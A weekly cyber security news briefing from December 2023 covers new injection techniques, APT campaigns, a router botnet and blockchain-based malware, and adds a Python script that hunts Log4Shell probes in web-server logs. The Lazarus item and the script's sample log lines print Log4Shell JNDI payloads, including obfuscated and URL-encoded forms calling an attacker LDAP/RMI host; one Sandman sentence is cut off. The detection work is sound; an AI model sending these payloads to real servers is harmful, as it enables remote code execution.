Cyber Security Briefing, 9 - 15 December

December 15, 2023

New Process Injection Techniques Undetectable by EDR Solutions

Security researchers at SafeBreach have discovered eight new process injection techniques that abuse Windows thread pools so that malicious code is executed as a side effect of legitimate thread-pool operations.

The injection variants have been named Pool Party. They work against any process, without restrictions, and were not detected by leading endpoint detection and response (EDR) solutions. In SafeBreach's tests the techniques achieved a 100% success rate: none of the EDRs tested was able to detect or prevent the Pool Party attacks.


APT Sandman uses KEYPLUG as a backdoor

The Sandman APT has been linked to Chinese threat actors that use the KEYPLUG backdoor, specifically the STORM-0866/Red Dev 40 cluster. Both PwC and Microsoft highlighted this connection at the recent LABScon 2023 cybersecurity conference. The LuaDream malware and the KEYPLUG backdoor were found coexisting on victims' systems.

Sandman and STORM-0866/Red Dev 40 also share infrastructure control and management practices, such as the choice of hosting providers and the rules used for naming domains. The implementation of LuaDream and KEYPLUG suggests very similar development practices and that both have similar.


Lazarus deploys three new malware families in a new campaign

Cisco Talos researchers have discovered a new operation attributed to the North Korean APT Lazarus, which they have named Operation Blacksmith. In this campaign the group employed three new malware families written in the D programming language: two remote access trojans (RATs), named NineRAT and DLRAT, and a downloader named BottomLoader.

According to the researchers, the operation began in March 2023 and has mainly targeted the industrial, agricultural and security sectors. During the campaign, Lazarus exploited CVE-2021-44228 (CVSS 10.0), known as Log4Shell, to deploy the three malware families.

It should be noted that Log4Shell is a flaw in the Apache Foundation's Log4j logging library that allows an unauthenticated attacker to achieve remote code execution: a string such as ${jndi:ldap://attacker/x} placed in any logged field (a User-Agent header, a login name) makes the vulnerable library fetch and execute attacker-controlled code.
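Because Log4Shell is still being exploited two years on, as this campaign shows, the practical takeaway for defenders is to hunt for JNDI lookup probes in web-server logs. The following is an added example written for this briefing (not Cisco Talos or Apache code); the log lines are constructed for the demo, and the `normalize` function undoes the common obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`, URL-encoding) that defeat a naive `${jndi:` string match.

```python
"""Hunt for Log4Shell (CVE-2021-44228) JNDI lookup probes in web-server logs.

Added example for the briefing; not part of the original page. Log lines are
constructed sample data. Addresses use documentation ranges (RFC 5737).
"""
import re
import urllib.parse

# Constructed sample access-log lines: one clean request, three probes using
# plain, nested-lookup and URL-encoded obfuscation, and one benign ${...}.
LOG_LINES = [
    '203.0.113.7 - - [15/Dec/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Dec/2023:10:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [15/Dec/2023:10:01:07 +0000] "GET /?x=${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.5/b} HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.9 - - [15/Dec/2023:10:01:09 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.5%2Fc%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.4 - - [15/Dec/2023:10:01:11 +0000] "GET /docs/${HOME}/page HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup (no nested braces or '$' inside).
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation a probe reads jndi:<scheme>://<target>/...
_JNDI = re.compile(r"jndi:([a-z]+)://([^/\s\"'}]+)", re.I)


def _resolve(inner: str) -> str:
    """Collapse one Log4j lookup into the text it would evaluate to.

    ${x:y:-default} -> default (covers ${::-j}, ${env:NaN:-j}, ${sys:X:-j})
    ${lower:X} / ${upper:X} -> case-changed literal
    Any other lookup keeps its content, so ${jndi:...} becomes jndi:...
    """
    if ":-" in inner:
        return inner.rsplit(":-", 1)[1]
    prefix, _, rest = inner.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return inner


def normalize(text: str) -> str:
    """Undo URL-encoding (up to two layers) and flatten nested lookups.

    Every substitution strictly shortens the string, so the loop terminates.
    """
    for _ in range(2):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        flattened = _LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if flattened == text:
            return text
        text = flattened


def find_log4shell_probes(lines):
    """Return one finding per line carrying a JNDI lookup, with its callback."""
    findings = []
    for line in lines:
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({
                "line": line,
                "scheme": match.group(1).lower(),   # ldap, rmi, dns, ...
                "target": match.group(2),           # attacker callback host[:port]
            })
    return findings


if __name__ == "__main__":
    for hit in find_log4shell_probes(LOG_LINES):
        print(f"{hit['scheme']:>4} -> {hit['target']}  | {hit['line'][:60]}")
```

The callback host in each finding is the value worth pivoting on: it is the attacker's LDAP/RMI server, and any outbound connection from the application host to it indicates the lookup actually fired rather than merely being logged.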


Threat actor Volt Typhoon is employing KV-botnet

Black Lotus Labs researchers at Lumen Technologies have detected and published an analysis of a new botnet they have named KV-botnet. The botnet, made up of small office/home office (SOHO) routers, is used by various threat actors as a covert network for relaying data.

The researchers note that KV-botnet has been active since February 2022 and that its activity has increased considerably since August 2023. There are two clusters of activity on the botnet, named KV and JDY. The former appears to be manually operated in attacks on high-value targets, while the latter performs broader scanning and is less technically sophisticated.

According to Black Lotus Labs, the botnet is operated by the Chinese threat actor Volt Typhoon, also known as Bronze Silhouette, and has been used in attacks against telecommunications companies and U.S. government entities, among others.


NKAbuse malware uses blockchain to perform DDoS

Kaspersky security researchers have reported the discovery of a new malware called NKAbuse, written in Go, which is the first known to abuse the NKN (New Kind of Network) blockchain-based peer-to-peer protocol for its command-and-control traffic, making it harder to detect and block. NKAbuse joins the NKN network as a node, in a way comparable to Tor relays, which makes the infrastructure more robust and decentralized and lets it handle significantly high data volumes.

In addition to its DDoS capabilities, NKAbuse also acts as a RAT on compromised systems, allowing its operators to execute commands, exfiltrate data and capture screenshots.
